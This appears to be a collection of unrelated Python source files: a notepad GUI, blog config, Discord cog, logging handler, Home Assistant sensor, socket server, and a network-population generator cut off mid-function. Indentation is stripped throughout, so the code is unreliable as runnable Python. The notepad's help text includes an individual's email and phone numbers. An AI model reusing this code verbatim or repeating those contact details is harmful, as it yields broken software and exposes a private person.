with open(os.path.join(proj_path, 'gdbinit')) as f_in, open(tempfiles[0], 'w') as f_out:
new_content = f_in.read()
# localhost connection issue occurs in docker unless:
new_content = new_content.replace(':3333', '127.0.0.1:3333', 1)
new_content = new_content.replace('file:///tmp/heap_log.svdat', 'file://{}'.format(tempfiles[1]), 1)
f_out.write(new_content)
with ttfw_idf.OCDBackend(os.path.join(proj_path, 'openocd.log'), dut.app.target):
dut.start_app()
dut.expect('esp_apptrace: Initialized TRAX on CPU0')
gdb_log = os.path.join(proj_path, 'gdb.log')
gdb_workdir = os.path.join(proj_path, 'main')
with ttfw_idf.GDBBackend(gdb_log, elf_path, dut.app.target, tempfiles[0], gdb_workdir) as p:
for _ in range(2): # There are two breakpoints
p.gdb.wait_target_state(debug_backend.TARGET_STATE_RUNNING)
stop_reason = p.gdb.wait_target_state(debug_backend.TARGET_STATE_STOPPED)
assert stop_reason == debug_backend.TARGET_STOP_REASON_BP, 'STOP reason: {}'.format(stop_reason)
# dut has been restarted by gdb since the last dut.expect()
dut.expect('esp_apptrace: Initialized TRAX on CPU0')
with ttfw_idf.CustomProcess(' '.join([os.path.join(dut.app.idf_path, 'tools/esp_app_trace/sysviewtrace_proc.py'),
'-p',
'-b', elf_path,
tempfiles[1]]),
logfile='sysviewtrace_proc.log') as sysviewtrace:
sysviewtrace.pexpect_proc.expect(re.compile(r'Found \d+ leaked bytes in \d+ blocks.'), timeout=120)
finally:
for x in tempfiles:
try:
os.unlink(x)
except Exception:
pass
if __name__ == '__main__':
test_examples_sysview_tracing_heap_log()
|
nilq/baby-python
|
python
|
from tkinter import *
from tkinter.messagebox import showinfo,askyesnocancel
from tkinter.filedialog import askopenfilename,asksaveasfilename
import os
from tkinter import simpledialog
def new(event=None): #.................Creates new file and saves current flle...........#
global file
var=askyesnocancel("New..","Do you want to save your document")
if(var!=None):
if(var==True):
saveas()
if(file!=None):
root.title("Untitled - J_PAD")
file=None
text.delete(1.0,END)
def openfile(event=None): #.................opens desired file in J_PAD...........#
global file
file=askopenfilename(defaultextension=".txt",filetypes=[("All files","*.*"),("Text Document","*.txt")])
if file == "": #.................Checks file exists or not...........#
file=None
else:
root.title(os.path.basename(file)+"-J_PAD")
text.delete(1.0,END)
f=open(file,"r")
text.insert(1.0,f.read())
f.close()
def saveas(event=None): #.................Saves known file with same name and untitled files with a new name in desired location...........#
global file
if file==None: #.................Checks file is untitled or known...........#
file = asksaveasfilename(initialfile='Untitled.txt',defaultextension=".txt",filetypes=[("All files","*.*"),("Text Document","*.txt")])
if file =="": #.................Checks file exists or not...........#
file=None
else:
f=open(file,"w")
f.write(text.get(1.0,END))
f.close()
root.title(os.path.basename(file)+"-J_PAD")
else:
f=open(file,"w") #.................Write to the existing file...........#
f.write(text.get(1.0,END))
f.close()
def exitroot(event=None): #.................Exits the main loop...........#
var=askyesnocancel(title=f"QUIT-{file}",message="Do you want to save the file before exit..")
if(var!=None):
if(var==True):
saveas()
root.destroy()
def copy(event=None): #.................Handles copy operation in file...........#
text.event_generate(("<<Copy>>"))
def paste(event=None): #.................Handles paste operation in file...........#
text.event_generate(("<<Paste>>"))
def selectall(event=None): #................Selects all the text in the file...........#
text.tag_add(SEL,"1.0",END)
text.mark_set(INSERT,"1.0")
text.see(INSERT)
return 'break'
def cut(event=None): #.................Handles cut operation in file...........#
text.event_generate(("<<Cut>>"))
def find(event=None): #.................finds the occurence of given word...........#
findstr=simpledialog.askstring("Find...","Enter the text you want to search")
textstr=text.get(1.0,END)
occurence=textstr.count(findstr)
showinfo("Find...",f"{findstr} have {occurence} occurences in the text ")
def about(event=None): #.................about J_PAD...........#
showinfo("J-PAD","Text editor by Himanshu")
def help(event=None): #.................Shows important information for help...........#
showinfo("Help...","For any help mail your queries on gmail devranihimanshu81@gmail.com\nContact on given numbers :- 9548609762 9761594415")
file=None
#.............................Main window layout......................#
root=Tk() #...................creates new window...............#
root.wm_iconbitmap("1.ico")
root.title("Untitled-J_PAD") #..................title of the root............#
root.geometry("1000x800") #...................defines initial geometry to the root.........#
scrollbarx=Scrollbar(root) #....................add scroll bar................#
scrollbarx.pack(side=RIGHT,fill=Y)
text = Text(root,font="comicsansms 11 bold") #....................text area for editor..........#
text.pack(expand=True,fill=BOTH)
scrollbarx.config(command=text.yview) #....................fix scroll bar with y view of text area...........#
menubar=Menu(root) #..............................Menu bar......................#
#.....................file menu......................#
filemenu=Menu(menubar,tearoff=0)
filemenu.add_command(label="New",command=new,accelerator="Ctrl+N")
root.bind_all("<Control-N>",new) #..........binds function with key press.........#
root.bind_all("<Control-n>",new)
filemenu.add_command(label="Open",command=openfile,accelerator="Ctrl+O")
root.bind_all("<Control-o>",openfile) #..........binds function with key press.........#
root.bind_all("<Control-O>",openfile)
filemenu.add_command(label="Save As",command=saveas,accelerator="Ctrl+S")
root.bind_all("<Control-s>",saveas) #..........binds function with key press.........#
root.bind_all("<Control-S>",saveas)
filemenu.add_separator()
filemenu.add_command(label="Exit",command=exitroot,accelerator="Ctrl+Q")
root.bind_all("<Control-q>",exitroot) #..........binds function with key press.........#
root.bind_all("<Control-Q>",exitroot)
menubar.add_cascade(label="File",menu=filemenu)
#.....................edit menu......................#
editmenu=Menu(menubar,tearoff=0)
editmenu.add_command(label="Copy",command=copy,accelerator="Ctrl+C")
root.bind_all("<Control-C>",copy) #..........binds function with key press.........#
root.bind_all("<Control-c>",copy)
editmenu.add_command(label="Paste",command=paste,accelerator="Ctrl+V")
root.bind_all("<Control-v>",paste) #..........binds function with key press.........#
root.bind_all("<Control-V>",paste)
editmenu.add_command(label="Cut",command=cut,accelerator="Ctrl+X")
root.bind_all("<Control-X>",cut) #..........binds function with key press.........#
root.bind_all("<Control-x>",cut)
editmenu.add_separator()
editmenu.add_command(label="Select All",command=selectall,accelerator="Ctrl+A")
root.bind_all("<Control-A>",selectall) #..........binds function with key press.........#
root.bind_all("<Control-a>",selectall)
editmenu.add_command(label="Find",command=find,accelerator="Ctrl+F")
root.bind_all("<Control-F>",find) #..........binds function with key press.........#
root.bind_all("<Control-f>",find)
menubar.add_cascade(label="Edit",menu=editmenu)
#.....................help menu......................#
helpmenu=Menu(menubar,tearoff=0)
helpmenu.add_command(label="Help",command=help)
helpmenu.add_command(label="About",command=about)
menubar.add_cascade(label="Help",menu=helpmenu)
root.config(menu=menubar)
root.mainloop() #..........................starts root.................#
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
Topic: 读写文本文件
Desc :
"""
def rw_text():
# Iterate over the lines of the file
with open('somefile.txt', 'rt') as f:
for line in f:
# process line
print(line)
# Write chunks of text data
with open('somefile.txt', 'wt') as f:
f.write('text1')
f.write('text2')
if __name__ == '__main__':
rw_text()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
AUTHOR = u'Eevee'
SITENAME = u'fuzzy notepad'
SITEURL = ''
#SITESUBTITLE = ...
TIMEZONE = 'America/Los_Angeles'
DEFAULT_LANG = u'en'
# Feed generation is usually not desired when developing
FEED_ATOM = None
FEED_ALL_ATOM = None
CATEGORY_FEED_ATOM = None
TRANSLATION_FEED_ATOM = None
# Blogroll
# TODO lol these don't exist in my theme and i'm not sure whether i care??
LINKS = (('Pelican', 'http://getpelican.com/'),
('Python.org', 'http://python.org/'),
('Jinja2', 'http://jinja.pocoo.org/'),
('You can modify those links in your config file', '#'),)
# Social cruft
# TODO theme doesn't support this, but i'd kinda like it for the main page
SOCIAL = (('You can add links in your config file', '#'),
('Another social link', '#'),)
TWITTER_USERNAME = 'eevee'
GITHUB_URL = 'https://github.com/eevee'
DEFAULT_PAGINATION = 17
DEFAULT_ORPHANS = 4
PAGINATION_PATTERNS = (
(1, '{base_name}/', '{base_name}/index.html'),
(2, '{base_name}/page/{number}/', '{base_name}/page/{number}/index.html'),
)
THEME = 'theme'
EXTRA_HEADER = """
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.0/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery.colorbox/1.4.33/jquery.colorbox-min.js"></script>
<script type="text/javascript">
$(function() {
$('article').each(function(index, article) {
console.log(index, article);
$(article).find('a.photo').colorbox({
fixed: true,
maxWidth: '100%',
maxHeight: '100%',
rel: 'colorbox' + String(index + 1)
});
});
});
</script>
"""
# Smart quotes and other things
TYPOGRIFY = True
MD_EXTENSIONS = [
'codehilite(css_class=highlight,linenums=True)',
'extra',
# GitHub-style fenced code blocks
'fenced_code',
# I don't actually care about a table of contents, but this turns headers
# into self-links
'toc(anchorlink=True)',
]
PATH = 'content/'
PAGE_DIR = '../pages/'
STATIC_PATHS = ['favicon.png', 'media']
# URL schema; compatible with Octopress, but i happen to like it anyway
ARCHIVES_URL = 'blog/archives/' # doesn't officially exist but whatever
ARCHIVES_SAVE_AS = 'blog/archives/index.html'
ARTICLE_URL = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/'
ARTICLE_SAVE_AS = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html'
AUTHOR_SAVE_AS = False
AUTHORS_SAVE_AS = False
CATEGORIES_URL = 'blog/categories/'
CATEGORIES_SAVE_AS = 'blog/categories/index.html'
CATEGORY_URL = 'blog/categories/{slug}/'
CATEGORY_SAVE_AS = 'blog/categories/{slug}/index.html'
PAGE_URL = '{slug}/'
PAGE_SAVE_AS = '{slug}/index.html'
TAG_URL = 'blog/tags/{slug}/'
TAG_SAVE_AS = 'blog/tags/{slug}/index.html'
TAGS_URL = 'blog/tags/'
TAGS_SAVE_AS = 'blog/tags/index.html'
# Octopress-compatible filename metadata parsing
FILENAME_METADATA = '(?P<date>\d{4}-\d{2}-\d{2})-(?P<slug>.*)'
# Uncomment following line if you want document-relative URLs when developing
#RELATIVE_URLS = True
### Plugins
# Some minor hackery to have multiple PLUGIN_PATHs, since I want both canonical
# plugins and one of my own...
import os.path
import sys
sys.path.insert(0, os.path.dirname(__file__))
import eeveeblog.liquid_photo
PLUGIN_PATH = "pelican-plugins.git"
PLUGINS = [
eeveeblog.liquid_photo,
'summary'
]
# Plugin config for summary
SUMMARY_BEGIN_MARKER = '<!-- just kidding i never use this -->'
SUMMARY_END_MARKER = '<!-- more -->' # octopress compat
# This is actually a stock setting; I don't want an automatic summary if I
# don't use an explicit marker
SUMMARY_MAX_LENGTH = None
|
nilq/baby-python
|
python
|
"""
Commands for fun
"""
from discord.ext import commands
class FunCommands(commands.Cog, name='Fun'):
def __init__(self, bot):
print('Loading FunCommands module...', end='')
self.bot = bot
print(' Done')
@commands.command(help='You spin me right round, baby, right round')
async def spin(self, ctx):
await ctx.send('https://www.youtube.com/watch?v=PGNiXGX2nLU')
@commands.command(aliases=['XcQ'], help='A very interesting video you should consider watching')
async def rickroll(self, ctx):
await ctx.send('<https://www.youtube.com/watch?v=dQw4w9WgXcQ>')
await ctx.send('<:kappa_jtcf:546748910765604875>')
@commands.command()
async def ping(self, ctx):
pong = await ctx.send('pong!')
time_diff = pong.created_at - ctx.message.created_at
await pong.edit(content='pong!\nTime delta is {0} ms'.format(time_diff.microseconds/1000))
@commands.command(hidden=True, aliases=['UDOD_COMMUNIST', 'UDOD', 'udod', 'УДОД_КОММУНИСТ', 'Удод_Коммунист', 'УДОД', 'Удод', 'удод'])
async def udod_communist(self, ctx):
await ctx.send('https://www.youtube.com/watch?v=YHR5_IvC8Gw')
@commands.command(hidden=True, aliases=['UDOD_COMMUNIST_2', 'UDOD2', 'udod2', 'УДОД_КОММУНИСТ_2', 'Удод_Коммунист_2', 'УДОД2', 'Удод2', 'удод2'])
async def udod_communist2(self, ctx):
await ctx.send('https://youtu.be/BgF5HcnNN-Q')
def setup(bot):
bot.add_cog(FunCommands(bot))
|
nilq/baby-python
|
python
|
from logging.handlers import DatagramHandler, SocketHandler
from logstash import formatter
# Derive from object to force a new-style class and thus allow super() to work
# on Python 2.6
class TCPLogstashHandler(SocketHandler, object):
"""Python logging handler for Logstash. Sends events over TCP.
:param host: The host of the logstash server.
:param port: The port of the logstash server (default 5959).
:param message_type: The type of the message (default logstash).
:param fqdn; Indicates whether to show fully qualified domain name or not (default False).
:param tags: list of tags for a logger (default is None).
:param limit_stacktrace: limit characters for stacktraces
:param limit_string_fields: limit characters for string fields
:param limit_containers: limit length of containers (dict, list, set)
"""
def __init__(self, host, port=5959, message_type='logstash', tags=None, fqdn=False,
limit_stacktrace=0, limit_string_fields=0, limit_containers=0):
super(TCPLogstashHandler, self).__init__(host, port)
self.formatter = formatter.LogstashFormatter(message_type, tags, fqdn, limit_stacktrace=limit_stacktrace,
limit_string_fields=limit_string_fields,
limit_containers=limit_containers)
def makePickle(self, record):
return self.formatter.format(record) + b'\n'
|
nilq/baby-python
|
python
|
"""
Get Shelly Cloud information for a given host through web api.
For more details about this platform, please refer to the documentation at
https://github.com/marcogazzola/custom_components/blob/master/README.md
"""
import logging
from homeassistant.helpers.entity import (Entity)
from .const import (
REQUIREMENTS_LIST,
CONF_DEVICES, DOMAIN as SHELLY_DOMAIN,
CONST_SENSOR_ROLLER, CONST_SENSOR_RELAY,
SENSOR_ICONS, CONST_SENSOR_SYSTEM, CONST_SENSOR_MQTT,
CONST_SENSOR_CLOUD, CONST_SENSOR_WIFI, CONST_UPTODATE,
CONST_UPDATEAVAILABLE, CONST_SENSOR_FIRMWARE, CONST_DISCONNECTED,
CONST_CONNECTED)
REQUIREMENTS = [REQUIREMENTS_LIST]
_LOGGER = logging.getLogger(__name__)
def setup_platform(
hass, config, add_entities, discovery_info=None):
"""Add the Shelly Cloud Sensor entities"""
from shellypython.const import (WORKING_MODE_RELAY, WORKING_MODE_ROLLER)
for ip_address, shelly_data in (
hass.data[SHELLY_DOMAIN][CONF_DEVICES].items()):
if ip_address not in hass.data[SHELLY_DOMAIN]['sensor']:
if shelly_data is not None and shelly_data.data is not None:
if shelly_data.data.working_mode_raw == WORKING_MODE_RELAY:
if CONST_SENSOR_ROLLER in shelly_data.monitored_conditions:
shelly_data.monitored_conditions.remove(
CONST_SENSOR_ROLLER)
elif shelly_data.data.working_mode_raw == WORKING_MODE_ROLLER:
if CONST_SENSOR_RELAY in shelly_data.monitored_conditions:
shelly_data.monitored_conditions.remove(
CONST_SENSOR_RELAY)
sensors = []
for variable in shelly_data.monitored_conditions:
sensors.append(
ShellySensor(shelly_data, variable, shelly_data.name))
hass.data[SHELLY_DOMAIN]['sensor'].append(ip_address)
add_entities(sensors, True)
class ShellySensor(Entity):
"""Implementation of Shelly sensor."""
def __init__(self, shelly_data, sensor_type, name):
"""Initialize the sensor."""
self.client_name = name
self._name = sensor_type
self.shelly_data = shelly_data
self.type = sensor_type
self._state = None
self._unit_of_measurement = None
self._attributes = None
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(self.client_name, self._name)
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
@property
def icon(self):
"""Return the icon to represent this sensor."""
if self.type in SENSOR_ICONS:
return SENSOR_ICONS[self.type]
return SENSOR_ICONS[CONST_SENSOR_SYSTEM]
@property
def state(self):
"""Return the expiration days for hostname."""
return self._state
@property
def device_state_attributes(self):
"""Get the more info attributes."""
return self._attributes
def _empty_state_and_attributes(self):
"""Empty the state and attributes on an error."""
from shellypython.const import (DEVICE_NOT_READY)
self._state = DEVICE_NOT_READY
self._attributes = None
def update(self):
"""Get the current Shelly status."""
# self.shelly_data.update()
if self.shelly_data is None or self.shelly_data.data is None:
self._empty_state_and_attributes()
return
if self.type == CONST_SENSOR_SYSTEM:
self._state = self.shelly_data.data.main_status
attributes_data = (
self.shelly_data.data.system.as_dict()
if self.shelly_data.data.system is not None
else None
)
attributes_data.update({'model': self.shelly_data.data.model})
attributes_data.update(
{'working_mode': self.shelly_data.data.working_mode}
)
attributes_data.update(
{'host_name': self.shelly_data.data.host_name}
)
self._attributes = attributes_data
elif self.type == CONST_SENSOR_MQTT:
attributes_data = (
self.shelly_data.data.mqtt
if self.shelly_data.data.mqtt is not None
else None)
if attributes_data is None or not attributes_data.connected:
self._state = CONST_DISCONNECTED
else:
self._state = CONST_CONNECTED
self._attributes = None
elif self.type == CONST_SENSOR_CLOUD:
attributes_data = (
self.shelly_data.data.cloud
if self.shelly_data.data.cloud is not None
else None)
if attributes_data is None or not attributes_data.connected:
self._state = CONST_DISCONNECTED
else:
self._state = CONST_CONNECTED
self._attributes = None
elif self.type == CONST_SENSOR_WIFI:
attributes_data = (
self.shelly_data.data.wifi_sta
if self.shelly_data.data.wifi_sta is not None
else None)
if attributes_data is None or not attributes_data.connected:
self._state = CONST_DISCONNECTED
self._attributes = None
else:
self._state = "{} %".format(attributes_data.quality)
self._attributes = {
"Ssid": attributes_data.ssid,
"Ip": attributes_data.ip,
"Rssi": attributes_data.rssi,
}
elif self.type == CONST_SENSOR_FIRMWARE:
attributes_data = (
self.shelly_data.data.firmware
if self.shelly_data.data.firmware is not None
else None)
if attributes_data is None or not attributes_data.has_update:
self._state = CONST_UPTODATE
self._attributes = (
{"Current version": attributes_data.old_version}
)
else:
self._state = CONST_UPDATEAVAILABLE
self._attributes = {
"Current version": attributes_data.old_version,
"Latest version": attributes_data.new_version,
}
elif self.type == CONST_SENSOR_FIRMWARE:
attributes_data = (
self.shelly_data.data.firmware
if self.shelly_data.data.firmware is not None
else None)
if attributes_data is None or not attributes_data.has_update:
self._state = CONST_UPTODATE
self._attributes = (
{"Current version": attributes_data.old_version}
)
else:
self._state = CONST_UPDATEAVAILABLE
self._attributes = {
"Current version": attributes_data.old_version,
"Latest version": attributes_data.new_version,
}
|
nilq/baby-python
|
python
|
from socket import *
from select import *
HOST = ''
PORT = 10001
BUFSIZE = 1024
ADDR = (HOST, PORT)
#소켓 생성
serverSocket = socket(AF_INET, SOCK_STREAM)
#소켓 주소
serverSocket.bind(ADDR)
#연결 수신
serverSocket.listen(1)
#연결 수락
clientSocekt, addr_info = serverSocket.accept()
print(clientSocekt)
while True:
data = clientSocekt.recv(65535)
if not data : break # 받은 data가 없을시에 통신종료
print(data.decode()) # 받은 data출력
line = input()
clientSocekt.sendall(line.encode()) # 문자 전송
clientSocekt.close()
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Name: population.py
Authors: Christian Haack, Stephan Meighen-Berger, Andrea Turcati
Constructs the population.
"""
from typing import Union, Tuple
import random
import numpy as np # type: ignore
import logging
import networkx as nx # type: ignore
import scipy.stats
from networkx.utils import py_random_state
from networkx.generators.community import _zipf_rv_below
from ..config import config
from ..pdfs import construct_pdf
from .population_base import Population
_log = logging.getLogger(__name__)
def intra_com_cons(g, u):
c = g.nodes[u]["community"]
adj_in_com = 0
for adj in g[u]:
if adj in c:
adj_in_com += 1
return adj_in_com
def suboptimal(g, u, target_intra):
adj_in_com = intra_com_cons(g, u)
return (adj_in_com < target_intra) and target_intra > 0
def supoptimal(g, u, target_intra):
adj_in_com = intra_com_cons(g, u)
return adj_in_com > target_intra
@py_random_state(6)
def _powerlaw_sequence(gamma, low, high, condition, length, max_iters, seed):
"""Returns a list of numbers obeying a constrained power law distribution.
``gamma`` and ``low`` are the parameters for the Zipf distribution.
``high`` is the maximum allowed value for values draw from the Zipf
distribution. For more information, see :func:`_zipf_rv_below`.
``condition`` and ``length`` are Boolean-valued functions on
lists. While generating the list, random values are drawn and
appended to the list until ``length`` is satisfied by the created
list. Once ``condition`` is satisfied, the sequence generated in
this way is returned.
``max_iters`` indicates the number of times to generate a list
satisfying ``length``. If the number of iterations exceeds this
value, :exc:`~networkx.exception.ExceededMaxIterations` is raised.
seed : integer, random_state, or None (default)
Indicator of random number generation state.
See :ref:`Randomness<randomness>`.
"""
for i in range(max_iters):
seq = []
while not length(seq):
seq.append(_zipf_rv_below(gamma, low, high, seed))
if condition(seq):
return seq
raise nx.ExceededMaxIterations("Could not create power law sequence")
@py_random_state(4)
def _generate_communities(degree_seq, community_sizes, mu, max_iters, seed):
"""Returns a list of sets, each of which represents a community.
``degree_seq`` is the degree sequence that must be met by the
graph.
``community_sizes`` is the community size distribution that must be
met by the generated list of sets.
``mu`` is a float in the interval [0, 1] indicating the fraction of
intra-community edges incident to each node.
``max_iters`` is the number of times to try to add a node to a
community. This must be greater than the length of
``degree_seq``, otherwise this function will always fail. If
the number of iterations exceeds this value,
:exc:`~networkx.exception.ExceededMaxIterations` is raised.
seed : integer, random_state, or None (default)
Indicator of random number generation state.
See :ref:`Randomness<randomness>`.
The communities returned by this are sets of integers in the set {0,
..., *n* - 1}, where *n* is the length of ``degree_seq``.
"""
# This assumes the nodes in the graph will be natural numbers.
result = [set() for _ in community_sizes]
n = len(degree_seq)
free = list(range(n))
com_indices = range(len(community_sizes))
for i in range(max_iters):
v = free.pop()
c = seed.choice(com_indices)
# s = int(degree_seq[v] * (1 - mu) + 0.5)
s = round(degree_seq[v] * (1 - mu))
# If the community is large enough, add the node to the chosen
# community. Otherwise, return it to the list of unaffiliated
# nodes.
if s < community_sizes[c]:
result[c].add(v)
else:
free.append(v)
# If the community is too big, remove a node from it.
if len(result[c]) > community_sizes[c]:
rnd_node = seed.choice(tuple(result[c]))
free.append(rnd_node)
result[c].remove(rnd_node)
if not free:
return result
msg = "Could not assign communities; try increasing min_community"
raise nx.ExceededMaxIterations(msg)
class NetworkXWrappers(object):
@staticmethod
def add_lfr_weights(g):
g.remove_edges_from(nx.selfloop_edges(g))
edge_weights = {}
inter_actions_rvs = construct_pdf(
config["population"]["nx"]["inter freq pdf"]
).rvs
intra_actions_rvs = construct_pdf(
config["population"]["nx"]["intra freq pdf"]
).rvs
inter_actions = inter_actions_rvs(len(g))
intra_actions = intra_actions_rvs(len(g))
for edge in g.edges:
if edge[0] in g.nodes[edge[1]]["community"]:
intra_rate_0 = intra_actions[edge[0]] / g.degree[edge[0]]
intra_rate_1 = intra_actions[edge[1]] / g.degree[edge[1]]
avg_int = 0.5 * (intra_rate_0 + intra_rate_1)
# mu is the fraction of inter-community interacions
edge_weights[edge] = avg_int
else:
inter_rate_0 = inter_actions[edge[0]] / g.degree[edge[0]]
inter_rate_1 = inter_actions[edge[1]] / g.degree[edge[1]]
avg_int = 0.5 * (inter_rate_0 + inter_rate_1)
edge_weights[edge] = avg_int
nx.set_edge_attributes(g, edge_weights, "weight")
return g
@staticmethod
def lfr_benchmark(pop_size, **kwargs):
kwargs["seed"] = config["runtime"]["random state"]
g = nx.generators.community.LFR_benchmark_graph(pop_size, **kwargs)
g = NetworkXWrappers.add_lfr_weights(g)
return g
@staticmethod
def lfr_ba(pop_size, **kwargs):
seed = config["general"]["random state seed"]
random.seed(seed)
state = config["runtime"]["random state"]
kwargs["seed"] = seed
mu = kwargs["mu"]
g = nx.barabasi_albert_graph(pop_size, kwargs["m"], seed=seed)
deg_seq = list(dict(nx.degree(g)).values())
min_community = kwargs.get("min_community", None)
max_community = kwargs.get("max_community", None)
n = pop_size
# Validate parameters for generating the community size sequence.
if min_community is None:
min_community = min(deg_seq) + 1
else:
if min_community < min(deg_seq) + 1:
print("Min community is smaller than min(k)+1. Adjusting")
min_community = min(deg_seq) + 1
if max_community is None:
max_community = 3*max(deg_seq)
else:
if max_community < max(deg_seq) + 1:
print("Max community is smaller than max(k)+1. Adjusting")
max_community = int(2 * (max(deg_seq)))
low, high = min_community, max_community
def condition(seq):
return sum(seq) == n
def length(seq):
return sum(seq) >= n
comms = _powerlaw_sequence(
kwargs["tau"],
low,
high,
condition,
length,
kwargs["max_iters"],
seed,
)
communities = _generate_communities(deg_seq, comms, mu, 50 * n, seed)
g.remove_edges_from(nx.selfloop_edges(g))
for c in communities:
for u in c:
g.nodes[u]["community"] = c
node_degrees = np.asarray(list(dict(g.degree).values()))
num_inter_con = state.binomial(node_degrees, mu)
num_intra_con = node_degrees - num_inter_con
# print("Target mu: ", np.sum(num_inter_con) / np.sum(node_degrees))
max_it = 75
it = -1
last_mu = 0
no_change_for = 0
while True:
it += 1
"""
if it % 5 == 4:
num_inter_con = state.binomial(node_degrees, mu)
num_intra_con = node_degrees - num_inter_con
"""
intra_cnt = np.sum(
[v in g.nodes[u]["community"] for u, v in g.edges]
)
cur_mu = 1 - intra_cnt / g.number_of_edges()
if (
np.abs(cur_mu / mu - 1) < kwargs["tolerance"] * mu
or cur_mu < mu
):
break
if cur_mu == last_mu:
no_change_for += 1
if no_change_for == 5:
print(
"No change for five steps. Current mu: ",
cur_mu,
" Target: ",
mu,
)
break
else:
no_change_for = 0
last_mu = cur_mu
if it > max_it:
print(
"Max iterations reached. Current mu: ",
cur_mu,
" Target: ",
mu,
)
break
# First find all sub- and sup-optimal nodes
all_sub_optimal_nodes = set()
all_sup_optimal_nodes = set()
for u, n_inter_con, n_intra_con in zip(
g, num_inter_con, num_intra_con
):
c = g.nodes[u]["community"]
if supoptimal(g, u, n_intra_con):
all_sup_optimal_nodes.add(u)
elif suboptimal(g, u, n_intra_con):
all_sub_optimal_nodes.add(u)
assert len(all_sup_optimal_nodes & all_sub_optimal_nodes) == 0
for u, n_inter_con, n_intra_con in zip(
g, num_inter_con, num_intra_con
):
if node_degrees[u] < 2:
continue
c = g.nodes[u]["community"]
if (
u not in all_sub_optimal_nodes
and u not in all_sup_optimal_nodes
):
continue
sub_optimal_nodes = all_sub_optimal_nodes & c
sup_optimal_nodes = all_sup_optimal_nodes & c
not_optimal_nodes = sub_optimal_nodes | sup_optimal_nodes
attempted_vs = set()
if u in sub_optimal_nodes:
sub_optimal_nodes.remove(u)
not_optimal_nodes.remove(u)
all_sub_optimal_nodes.remove(u)
while True:
if len(not_optimal_nodes) < 1:
break
if not suboptimal(g, u, n_intra_con):
break
candidates = tuple(not_optimal_nodes - attempted_vs)
if not candidates:
break
if kwargs["pref_attach"]:
v = random.choices(
candidates,
weights=node_degrees[list(candidates)],
)[0]
else:
v = random.choice(candidates)
attempted_vs.add(v)
if v in sup_optimal_nodes:
# Strategy:
# -Rewire an internal connection from v to u
# -Rewire an external connection from u to v
# Get external adjacent node of u
target_1 = None
shuffled_adj = list(g[u])
random.shuffle(shuffled_adj)
for adj in shuffled_adj:
if (
adj not in c
and adj not in g[v]
and adj != v
):
target_1 = adj
break
if target_1 is None:
continue
# Get internal adjacent node of v
target_2 = None
for adj in g[v]:
if adj in c and adj not in g[u] and adj != u:
target_2 = adj
break
if target_2 is None:
continue
g.remove_edge(u, target_1)
g.remove_edge(v, target_2)
g.add_edge(u, target_2)
g.add_edge(v, target_1)
if not supoptimal(g, v, num_intra_con[v]):
sup_optimal_nodes.remove(v)
all_sup_optimal_nodes.remove(v)
not_optimal_nodes.remove(v)
else:
# Strategy:
# -Rewire an external connection from v to u
# -Rewire an external connection from u to v
# -Connect the two external nodes
# Pick a sub-optimal node from community
# v = random.choices(
# tuple(sub_optimal_nodes),
# weights=[g.degree[node]
# for node in sub_optimal_nodes])[0]
if v in g[u]:
continue
# From edges of u
shuffled_adj = list(g[u])
random.shuffle(shuffled_adj)
target_1 = None
for adj in shuffled_adj:
if adj not in c:
target_1 = adj
break
if target_1 is None:
break
target_2 = None
for adj in g[v]:
if (
adj not in c
# and adj in all_sup_optimal_nodes
and adj != target_1
and target_2
not in g.nodes[target_1]["community"]
and target_2 not in g[target_1]
):
target_2 = adj
break
if target_2 is None:
break
g.add_edge(u, v)
g.remove_edge(u, target_1)
g.remove_edge(v, target_2)
g.add_edge(target_1, target_2)
if not suboptimal(g, v, num_intra_con[v]):
sub_optimal_nodes.remove(v)
all_sub_optimal_nodes.remove(v)
not_optimal_nodes.remove(v)
if suboptimal(g, u, num_intra_con[u]):
sub_optimal_nodes.add(u)
all_sub_optimal_nodes.add(u)
not_optimal_nodes.add(u)
# TODO: check targets?
else:
sup_optimal_nodes.remove(u)
all_sup_optimal_nodes.remove(u)
not_optimal_nodes.remove(u)
while True:
if len(sub_optimal_nodes) < 1:
break
if not supoptimal(g, u, n_intra_con):
break
candidates = tuple(sub_optimal_nodes - attempted_vs)
if not candidates:
break
if kwargs["pref_attach"]:
v = random.choices(
candidates,
weights=node_degrees[list(candidates)],
)[0]
else:
v = random.choice(candidates)
attempted_vs.add(v)
"""
v = random.choices(
tuple(sub_optimal_nodes),
weights=[g.degree[node]
for node in sub_optimal_nodes])[0]
"""
# Pick adjacent internal node
# u - target1
target_1 = None
shuffled_adj = list(g[u])
random.shuffle(shuffled_adj)
for adj in shuffled_adj:
if adj in c and adj not in g[v] and adj != v:
target_1 = adj
break
if target_1 is None:
# No luck this turn
break
target_2 = None
# Choose an inter-community edge from v
# v - target_2
for adj in g[v]:
if adj not in c and adj not in g[u]:
target_2 = adj
break
if target_2 is None:
break
g.remove_edge(u, target_1) # u-1i, target1-1i
g.remove_edge(v, target_2) # v-1e, target2-1e
g.add_edge(u, target_2) # u+1e, target2+1e
g.add_edge(v, target_1) # v+1i, target1+1i
if not suboptimal(g, v, num_intra_con[v]):
sub_optimal_nodes.remove(v)
all_sub_optimal_nodes.remove(v)
not_optimal_nodes.remove(v)
if not supoptimal(g, u, num_intra_con[u]):
sup_optimal_nodes.add(u)
all_sup_optimal_nodes.add(u)
not_optimal_nodes.add(u)
g = NetworkXWrappers.add_lfr_weights(g)
nx.set_node_attributes(
g, kwargs["symp_prob"], "symp_prob")
return g
@staticmethod
def hierarchical_lfr_ba(pop_size, **kwargs):
seed = config["general"]["random state seed"]
n = pop_size
random.seed(seed)
def condition(seq):
return sum(seq) == n
def length(seq):
return sum(seq) >= n
graph_sizes = _powerlaw_sequence(
kwargs["tau_graphs"],
kwargs["min_graph"],
kwargs["max_graph"],
condition,
length,
kwargs["max_iters"],
seed,
)
cur_size = 0
combined = nx.Graph()
for hier_com, gs in enumerate(graph_sizes):
